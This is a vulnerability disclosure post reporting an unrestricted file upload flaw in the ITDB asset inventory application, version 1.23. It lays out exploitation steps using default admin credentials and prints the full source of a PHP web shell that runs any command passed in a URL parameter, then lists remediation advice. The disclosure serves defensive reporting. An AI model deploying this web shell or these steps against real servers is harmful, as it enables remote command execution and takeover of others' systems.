I Found The Security Issue

[rungga]

Hey Sivann,

I found the security issue / vulnerability on ITDB application. I have sent Proof of Concept to your email "[email protected]".

is it possible if I post the vulnerability in here?

[rungga]

PoC ITDB - Unrestricted File Upload.pdf

Exploit Title: Unrestricted File Upload Vulnerability on ITDB (IT ITems DataBase) Application
Date: Sept 07th, 2017
Exploit Author: @rungga_reksya
Vendor Homepage: http://www.sivann.gr/software/itdb/
Software Link: https://github.com/sivann/itdb/archive/master.zip
Version: 1.23
Tested on: Windows Server 2008 R2 
CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H (7.5 - HIGH)

I. Application Background:
ITDB is a web based asset inventory management tool used to store information about assets found in office environments, with a focus -but not lmited to- IT assets. It is not or targets for ITIL/CMDB compliance (yet), but it has served me for years and hopefully it will do the same for you :-)
ITDB comes with sources and is distributed under the GNU Public license. 

II. Vulnerability Description:
Unrestricted file upload vulnerability in “Add File” menu at ITDB version 1.23 allows authenticated with type account is “Full Access or Read” to upload malicious code (shell) with extension is “php”.

III. Exploit:
If we refer to file “00-INSTALL.txt” which is username and password default “admin/admin”. Example Attacker got admin privilege and login as admin into ITDB application. Then Attacker access to “Add File” menu and Upload a File your shell (shellcmd.php), and then click Save —> Bingo Success

Directory Listing at “http://target.com/itdb-directory/data/files/“ 

Check your shell on field “Filename” and access your shell like this:
http://target.com/[itdb-directory]/data/files/yourshell.php?cmd=whoami

script for shellcmd.php

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

======

IV. Remediation:
Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like .htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the files within it are not executable. If possible, rename the files that are uploaded. (source: https://www.acunetix.com/vulnerabilities/web/unrestricted-file-upload)

Content-type Verification: This kind of verification completely depends upon content-type header, e.g. Content-Type: image/jpeg, containing the MIME type. This is a very weak validation mechanism, as this header is supplied by the user or attacker. (source: https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)

V. Proof of Concept:

Admin Privilege (Full Access)

Low User (Read Only)